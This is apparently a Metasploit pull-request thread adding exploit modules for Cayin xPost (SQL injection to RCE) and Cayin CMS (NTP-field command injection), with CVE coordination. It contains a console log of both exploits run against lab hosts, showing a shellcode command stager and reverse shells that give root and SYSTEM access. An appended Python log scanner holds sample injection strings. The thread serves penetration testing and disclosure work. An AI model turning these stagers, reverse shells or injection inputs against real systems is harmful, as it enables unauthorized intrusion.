
Cayin xPost and CMS exploits #13607

Merged: 7 commits, merged Jun 18, 2020

Conversation

h00die (Contributor) commented Jun 12, 2020

This PR adds 2 exploits by @liquidworm against Cayin products.

The first is Cayin xPost with an unauthenticated SQLi to RCE on Windows. Luckily they bundle MySQL and Tomcat, so the env is pretty static. Gives SYSTEM level access. Once landed, this may be a good candidate for @red0xff to convert to his SQLi library (and pull the user table, optionally, as we discussed in Slack).

The second is Cayin CMS (-SE) with an authenticated RCE. The guide said to install it on Ubuntu 16.04; my attempt on 20.04 failed, so use 16.04!!! This is a pretty trivial RCE in an NTP field for root access.

Verification

  • Start msfconsole
  • use each module
  • Verify you get root/SYSTEM shells
  • Document is good and correct.

h00die (Contributor, Author) commented Jun 12, 2020

@liquidworm your CMS one, while the NTP IP field was vulnerable, we had different paths and parameters as compared to your EDB code. What device(s) did you test it against?

@liquidworm did you apply for CVEs for these findings? If not @todb-r7 can put in for them if you want.

h00die (Contributor, Author) commented Jun 12, 2020

@ccondon-r7 No rush on assigning this, but the website only lets you download the 'latest', so someone may want to go download the files now in case they get patched. Then they can let it sit for a while till they get to reviewing this.

I also have them and can provide them.

gwillcox-r7 (Contributor) commented Jun 12, 2020

https://www.cayintech.com/download/digital_signage_trial/CAYIN_CMS-SE_v110.zip <- Grabbed a copy of the CMS from here for safe keeping.

https://www.cayintech.com/download/digital_signage_trial/xPost_v2.5.zip <- Grabbed a copy of the xPost software from here for safe keeping.

Thanks @h00die for the heads up :) (Edit: Whoops, see you mentioned you already have copies as well 😅)

liquidworm commented

> @liquidworm your CMS one, while the NTP IP field was vulnerable, we had different paths and parameters as compared to your EDB code. What device(s) did you test it against?
>
> @liquidworm did you apply for CVEs for these findings? If not @todb-r7 can put in for them if you want.

@h00die The CMS was tested against version 11.0, but I've noticed that in different builds there are slight changes in parameters and code for the NTP server testing feature, which remains vulnerable.
I have not applied for CVE IDs; @todb-r7 can put in for them if not a hustle. Thanks ;]

space-r7 self-assigned this Jun 15, 2020

space-r7 (Contributor) left a review comment

Just a few minor things

todb-r7 commented Jun 17, 2020

@liquidworm no hassle at all, I’ll put in for a CVE and bug you for anything that’s unclear.

todb-r7 commented Jun 17, 2020

@liquidworm Okay here's some CVEs to use:

Let's see if I can ninja-edit these into the modules.

(cc @djordan-r7 )

h00die (Contributor, Author) commented Jun 17, 2020

Thanks @todb-r7 !

liquidworm commented

Thanks @todb-r7 ^^

space-r7 (Contributor) commented

Tested both modules:

msf5 > use exploit/linux/http/cayin_cms_ntp 
msf5 exploit(linux/http/cayin_cms_ntp) > set rhosts 172.16.215.134
rhosts => 172.16.215.134
msf5 exploit(linux/http/cayin_cms_ntp) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(linux/http/cayin_cms_ntp) > set verbose true
verbose => true
msf5 exploit(linux/http/cayin_cms_ntp) > check

[+] Cayin CMS install detected
[*] 172.16.215.134:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/cayin_cms_ntp) > options

Module options (exploit/linux/http/cayin_cms_ntp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Username to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.215.134   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The URI of Cayin CMS
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   administrator    yes       Username to login with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.215.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(linux/http/cayin_cms_ntp) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Cayin CMS install detected
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0'>>/tmp/lSdfj", "printf '\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\254\\20\\327\\1\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200'>>/tmp/lSdfj", "printf '\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170'>>/tmp/lSdfj", "printf '\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/lSdfj ; chmod +x /tmp/lSdfj ; /tmp/lSdfj ; rm -f /tmp/lSdfj"]
[*] Command Stager progress -  25.95% done (199/767 bytes)
[*] Command Stager progress -  51.76% done (397/767 bytes)
[*] Command Stager progress -  77.84% done (597/767 bytes)
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 172.16.215.134
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.134:53672) at 2020-06-18 10:17:56 -0500
[*] Command Stager progress - 100.00% done (767/767 bytes)

meterpreter > getuid
Server username: no-user @ CMS-SE (uid=0, gid=1001, euid=0, egid=1001)
meterpreter > sysinfo
Computer     : 172.16.215.134
OS           : Ubuntu 16.04 (Linux 4.15.0-45-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.215.134 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(linux/http/cayin_cms_ntp) > use exploit/windows/http/cayin_xpost_sql_rce 
msf5 exploit(windows/http/cayin_xpost_sql_rce) > set rhosts 192.168.37.131
rhosts => 192.168.37.131
msf5 exploit(windows/http/cayin_xpost_sql_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/http/cayin_xpost_sql_rce) > options

Module options (exploit/windows/http/cayin_xpost_sql_rce):

   Name          Current Setting        Required  Description
   ----          ---------------        --------  -----------
   LOCALWEBROOT  C:/CayinApps/webapps/  yes       Local install path webroot
   PAYLOADNAME                          no        Name of payload file to write
   Proxies                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.37.131         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80                     yes       The target port (TCP)
   SSL           false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                      yes       The URI of Cayin xPost
   VHOST                                no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.37.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(windows/http/cayin_xpost_sql_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Command shell session 2 opened (192.168.37.1:4444 -> 192.168.37.131:52540) at 2020-06-18 10:19:14 -0500
[!] Tried to delete C:/CayinApps/webapps/hq3HvyOcp4x.jsp, unknown result


C:\CayinApps\Tomcat>
C:\CayinApps\Tomcat> whoami
 whoami
nt authority\system

space-r7 merged commit db4006e into rapid7:master Jun 18, 2020
3 checks passed

space-r7 (Contributor) commented Jun 18, 2020

Release Notes

Cayin CMS NTP Server RCE and Cayin xPost wayfinder_seqid SQLi to RCE modules exploit Cayin software. The Cayin xPost module exploits a blind SQL injection vulnerability that results in code execution as SYSTEM. The Cayin CMS NTP module gets authenticated code execution by injecting code into the ntpIP parameter in a request to system_service.cgi.
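As an added defender-side example (not part of this PR or of the Metasploit modules), the following Python scans constructed web-server access log lines for the two request shapes the release notes describe: a system_service.cgi request whose ntpIP parameter is not a plain hostname or IP address, and a wayfinder_seqid value that is not a numeric id. The URL paths, log format and sample lines are assumptions, as is the premise that the parameters appear in the logged request target (POST bodies would need a different source).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined-log style); not taken from the PR.
# The /cgi-bin and /xpost paths are assumptions; only the script/parameter names come from the thread.
SAMPLE_LOG = """\
10.0.0.7 - - [18/Jun/2020:10:17:50 -0500] "GET /cgi-bin/system_service.cgi?ntpIP=10.0.0.5 HTTP/1.1" 200 512
10.0.0.7 - - [18/Jun/2020:10:17:56 -0500] "GET /cgi-bin/system_service.cgi?ntpIP=10.0.0.5%3Bid HTTP/1.1" 200 512
10.0.0.9 - - [18/Jun/2020:10:19:10 -0500] "GET /xpost/wayfinder.jsp?wayfinder_seqid=12 HTTP/1.1" 200 2048
10.0.0.9 - - [18/Jun/2020:10:19:14 -0500] "GET /xpost/wayfinder.jsp?wayfinder_seqid=12%27%20OR%201%3D1 HTTP/1.1" 200 2048
10.0.0.9 - - [18/Jun/2020:10:19:20 -0500] "GET /index.html HTTP/1.1" 200 100
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Positive validation: an NTP server setting should only ever be a hostname or IP literal.
HOST_RE = re.compile(r'^[A-Za-z0-9.\-]{1,253}$')


def analyse_line(line):
    """Return a finding string for a suspicious request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['target'])
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values

    # Cayin CMS: paths differ between builds (per the thread), so match on the script name only.
    if parts.path.endswith('system_service.cgi'):
        for value in params.get('ntpIP', []):
            if not HOST_RE.match(value):
                return f"{m['ip']} CMS ntpIP command injection attempt: {value!r}"

    # Cayin xPost: wayfinder_seqid is a numeric record id; anything else is an injection probe.
    for value in params.get('wayfinder_seqid', []):
        if not value.isdigit():
            return f"{m['ip']} xPost wayfinder_seqid SQLi attempt: {value!r}"
    return None


def scan(log_text):
    """Run analyse_line over every line and return the non-empty findings in order."""
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```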

adfoster-r7 added the rn-modules label (release notes for new or majorly enhanced modules) Jun 19, 2020
h00die deleted the cayin branch July 21, 2020 23:06